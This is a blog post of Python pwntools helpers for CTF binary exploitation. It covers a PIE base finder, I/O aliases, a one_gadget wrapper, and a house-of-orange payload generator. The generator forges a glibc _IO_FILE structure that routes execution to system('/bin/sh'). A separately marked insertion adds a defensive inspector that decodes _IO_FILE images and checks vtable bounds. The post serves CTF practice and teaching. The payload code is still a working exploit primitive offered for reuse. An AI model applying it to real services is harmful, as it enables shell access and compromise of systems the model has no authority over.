Building Wheels

  1. Preface
  2. Getting the base address of a PIE binary:
  3. Quickly generating a house of orange payload
  4. Simplifying IO interaction
  5. onegadget

Preface

A few helpers that simplify common pwn-related chores. None of it is complicated; some is borrowed, some is my own, and I will keep adding more over time.

Getting the base address of a PIE binary:

Pass in the process object (the pwntools tube) and it returns the program's base address, which is handy for debugging.

import os

def get_proc_base(p):
    # p.libs() maps the real path of every mapped file (the executable included)
    # to its load address, so key it by the executable's real path.
    return p.libs()[os.path.realpath(p.executable)]

Quickly generating a house of orange payload

Mainly based on: https://xz.aliyun.com/t/2411#toc-3

It only needs the libc ELF object and the libc base address; the payload is laid out starting from the prev_size field of the unsorted bin chunk.

from pwn import p32, p64

def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    # Build a 64-bit glibc _IO_FILE image (0xd8 bytes); the caller appends the vtable pointer.
    # Bytes padding is used so this works under both Python 2 and Python 3 pwntools.
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")   # _lock lives at offset 0x88
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")   # _wide_data at 0xa0
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b"\x00")   # _mode at 0xc0
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")   # sizeof(struct _IO_FILE) == 0xd8
    return file_struct


def pack_file_flush_str_jumps(_IO_str_jumps_addr, _IO_list_all_ptr, system_addr, binsh_addr):
    payload = pack_file(_flags = 0,
                        _IO_read_ptr = 0x61, # smallbin4file_size
                        _IO_read_base = _IO_list_all_ptr-0x10, # unsorted bin attack _IO_list_all_ptr,
                        _IO_write_base = 0,
                        _IO_write_ptr = 1,
                        _IO_buf_base = binsh_addr,
                        _mode = 0,
                       )
    payload += p64(_IO_str_jumps_addr-8)  # vtable
    payload += p64(0) # padding
    payload += p64(system_addr)
    return payload


def get_io_str_jumps_offset(libc):
    # _IO_str_jumps is not an exported symbol; locate it by finding the reference
    # to _IO_str_underflow (slot at +0x20 of the table) past _IO_file_jumps.
    IO_file_jumps_offset = libc.sym['_IO_file_jumps']
    IO_str_underflow_offset = libc.sym['_IO_str_underflow']
    for ref_offset in libc.search(p64(IO_str_underflow_offset)):
        possible_IO_str_jumps_offset = ref_offset - 0x20
        if possible_IO_str_jumps_offset > IO_file_jumps_offset:
            return possible_IO_str_jumps_offset


def house_of_orange_payload(libc, libc_base):
    io_str_jump = libc_base + get_io_str_jumps_offset(libc)
    io_list_all = libc_base + libc.symbols['_IO_list_all']
    system = libc_base + libc.symbols['system']
    bin_sh = libc_base + next(libc.search(b'/bin/sh'))
    payload = pack_file_flush_str_jumps(io_str_jump, io_list_all, system, bin_sh)
    return payload
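An added example, not code from the original post or the referenced write-up: a stdlib-only inspector that decodes a 64-bit _IO_FILE image at the same offsets pack_file writes, so a buffer recovered from a heap dump or a generated payload can be checked field by field. vtable_in_section mirrors the idea behind glibc's IO_validate_vtable check (glibc 2.24 and later rejects a vtable pointer outside the __libc_IO_vtables section); the section bounds and addresses used in build_sample_file are constructed values, not real ones.

```python
import struct

# 64-bit glibc _IO_FILE layout, the offsets pack_file relies on: (name, offset, size).
IO_FILE_FIELDS = (
    ("_flags", 0x00, 4), ("_IO_read_ptr", 0x08, 8), ("_IO_read_end", 0x10, 8),
    ("_IO_read_base", 0x18, 8), ("_IO_write_base", 0x20, 8), ("_IO_write_ptr", 0x28, 8),
    ("_IO_write_end", 0x30, 8), ("_IO_buf_base", 0x38, 8), ("_IO_buf_end", 0x40, 8),
    ("_IO_save_base", 0x48, 8), ("_IO_backup_base", 0x50, 8), ("_IO_save_end", 0x58, 8),
    ("_markers", 0x60, 8), ("_chain", 0x68, 8), ("_fileno", 0x70, 4),
    ("_lock", 0x88, 8), ("_wide_data", 0xa0, 8), ("_mode", 0xc0, 4),  # _mode is an int
)
IO_FILE_SIZE = 0xd8  # sizeof(struct _IO_FILE); the vtable pointer sits right after it


def unpack_io_file(buf):
    """Decode an _IO_FILE image plus its trailing vtable pointer into a dict of fields."""
    if len(buf) < IO_FILE_SIZE + 8:
        raise ValueError("need at least 0x%x bytes, got 0x%x" % (IO_FILE_SIZE + 8, len(buf)))
    fields = {}
    for name, off, size in IO_FILE_FIELDS:
        fmt = "<I" if size == 4 else "<Q"
        fields[name] = struct.unpack_from(fmt, buf, off)[0]
    fields["vtable"] = struct.unpack_from("<Q", buf, IO_FILE_SIZE)[0]
    return fields


def vtable_in_section(fields, section_start, section_end):
    """Same idea as glibc's IO_validate_vtable: the vtable pointer must fall inside
    the __libc_IO_vtables section [section_start, section_end), otherwise it is rejected."""
    return section_start <= fields["vtable"] < section_end


def build_sample_file():
    """Constructed sample image with a few fields set; all addresses are made up."""
    img = bytearray(IO_FILE_SIZE + 8)
    struct.pack_into("<Q", img, 0x08, 0x61)                   # _IO_read_ptr
    struct.pack_into("<Q", img, 0x28, 1)                      # _IO_write_ptr
    struct.pack_into("<Q", img, 0x38, 0x7f0000001234)         # _IO_buf_base (constructed)
    struct.pack_into("<Q", img, IO_FILE_SIZE, 0x7f00003a1000) # vtable (constructed)
    return bytes(img)


if __name__ == "__main__":
    for name, value in unpack_io_file(build_sample_file()).items():
        print("%-16s 0x%x" % (name, value))
```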

Simplifying IO interaction

Plenty of people already do this; wrapping it up once means even less code at each call site:

from pwn import log

def simple_io(p):
    # Short aliases for the pwntools tube methods used most often in exploit scripts.
    ru = lambda x : p.recvuntil(x)
    sn = lambda x : p.send(x)
    rl = lambda   : p.recvline()
    sl = lambda x : p.sendline(x)
    rv = lambda x : p.recv(x)
    sa = lambda a,b : p.sendafter(a,b)
    sla = lambda a,b : p.sendlineafter(a, b)
    slog = lambda x : log.success(x)
    flog = lambda x : log.failure(x)   # failure logging, as the name suggests
    return ru,sn,rl,sl,rv,sa,sla,slog,flog

ru,sn,rl,sl,rv,sa,sla,slog,flog = simple_io(p)

This trims the code quite a bit, although it occasionally runs into some baffling problems.

onegadget

Previously I had to run the tool by hand every time and note down the results, which was tedious; the author's GitHub shows it can be called directly from code:

import subprocess

def one_gadget(filename):
    # `one_gadget --raw` prints the candidate offsets as space-separated decimal numbers
    return list(map(int, subprocess.check_output(['one_gadget', '--raw', filename]).split()))

It returns a list of the offsets.

... to be continued


Contact: 1037178204@qq.com

Article title: Building Wheels

Author: t1an5t

Published: 2019-06-19, 15:40:33

Last updated: 2020-02-05, 20:49:22

Original link: http://yoursite.com/%E9%80%A0%E8%BD%AE%E5%AD%90/

License: "Attribution-NonCommercial-ShareAlike 4.0". Please keep the original link and author when reposting.